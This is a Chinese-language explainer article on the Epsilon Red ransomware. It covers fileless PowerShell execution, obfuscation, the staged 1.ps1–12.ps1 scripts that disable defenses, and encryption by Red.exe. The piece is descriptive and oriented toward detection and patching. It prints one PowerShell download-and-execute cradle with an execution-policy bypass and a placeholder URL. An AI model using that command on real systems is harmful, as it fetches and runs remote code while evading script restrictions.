什麼是 Epsilon Red 勒索軟體？

你的伺服器打補丁了嗎？

一種名為 Epsilon Red 的新勒索軟體威脅針對企業資料中心中未修補的基於 Microsoft 的伺服器。 Epsilon Red 以漫威漫畫中一個鮮為人知的反派命名，最近被一家名為 Sophos 的網路安全公司發現。自發現以來，勒索軟體已經攻擊了世界各地的許多組織。

無檔案勒索軟體「隱藏」在 PowerShell 中

無檔案勒索軟體是一種透過捆綁合法軟體來執行的惡意軟體。基於PowerShell的無檔案惡意軟體利用 PowerShell 的能力直接載入到裝置記憶體中。此功能有助於保護 PowerShell 腳本中的惡意軟體免受偵測。

在典型場景中，當腳本執行時，必須先將其寫入裝置的磁碟機。這允許端點安全解決方案檢測腳本。由於 PowerShell 被排除在標準腳本執行流程之外，因此它可以繞過端點安全性。此外，在PowerShell腳本中使用bypass參數可讓攻擊者繞過網路腳本限制。

PowerShell 繞過參數的範例是：

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))

如您所見，設計 PowerShell 繞過參數相對容易。

作為回應，微軟發布了一個補丁來解決與PowerShell相關的遠端惡意軟體執行漏洞。然而，補丁只有在使用時才有效。許多組織放鬆了修補標準，使其環境容易受到攻擊。 Epsilon Red 的設計就是利用這種程度的漏洞。

Epsilon Red 的雙重用途

由於 Epsilon Red 對於未打補丁的 Microsoft 伺服器最有效，因此該惡意軟體可用作勒索軟體和識別工具。無論 Epsilon 在環境中是否成功，攻擊者都可以更深入地了解目標的安全功能。

如果 Epsilon 成功存取 Microsoft Exchange Server，則表示組織沒有遵循常見的修補安全最佳實務。對於攻擊者來說，這表明目標環境的其餘部分是多麼容易被 Epsilon 破壞。

Epsilon Red 使用混淆來隱藏其有效負載。混淆使程式碼不可讀，並在 PowerShell 惡意軟體中使用，以避免 PowerShell 腳本的高可讀性。透過混淆，PowerShell 別名cmdlet用於使防毒軟體難以識別 PowerShell 日誌中的惡意腳本。

什麼是 Epsilon Red 勒索軟體？

Epsilon Red 對於未打補丁的 Microsoft 伺服器最有效

但是，仍然可以識別經過混淆的 PowerShell 腳本。即將發生的 PowerShell 腳本攻擊的一個常見跡像是建立 WebClient 物件。攻擊者將在 PowerShell 程式碼中建立 WebClient 對象，以建立到包含惡意程式碼的遠端URL的外部連線。

如果組織受到攻擊，其採取足夠的安全措施來偵測混淆的 PowerShell 腳本的可能性非常低。相反，如果 Epsilon Red 無法滲透伺服器，這將向攻擊者表明目標網路可以快速解密 PowerShell 惡意軟體，從而使攻擊的價值降低。

Epsilon Red 網路入侵

Epsilon Red 的功能非常簡單。該軟體使用一系列 Powershell 腳本來滲透伺服器。這些 PowerShell 腳本的編號為1.ps1到12.ps1。每個 PowerShell 腳本的設計都是為最終負載準備目標伺服器。

Epsilon Red 中的所有 PowerShell 腳本都有自己的用途。 Epsilon Red 中的 PowerShell 腳本之一旨在解析目標的網路防火牆規則。該系列中的另一個軟體旨在卸載目標的防毒軟體。

正如您可能猜到的，這些腳本同步工作，以確保一旦有效負載交付，目標就無法快速停止其進度。

什麼是 Ryuk 勒索軟體？如何避免呢？

傳輸有效負載

一旦 Epsilon 的 PowerShell 腳本為其最終有效負載讓路，它就會作為擴充Red.exe分發。當它進入伺服器時，Red.exe 將掃描伺服器的檔案並為它偵測到的每個檔案建立目錄路徑清單。建立清單後，將從主惡意軟體檔案為清單中的每個目錄路徑建立子進程。然後，每個勒索軟體子檔案都會加密清單檔案中的目錄路徑。

在愛普生清單中的所有資料夾路徑都被加密後，將留下一個.txt檔案來通知目標並說明攻擊者的請求。此外，連接到受感染伺服器的所有可存取網路節點都將受到威脅，並且惡意軟體進入網路的可能性可能會增加。

Epsilon Red 的幕後黑手是誰？

什麼是 Epsilon Red 勒索軟體？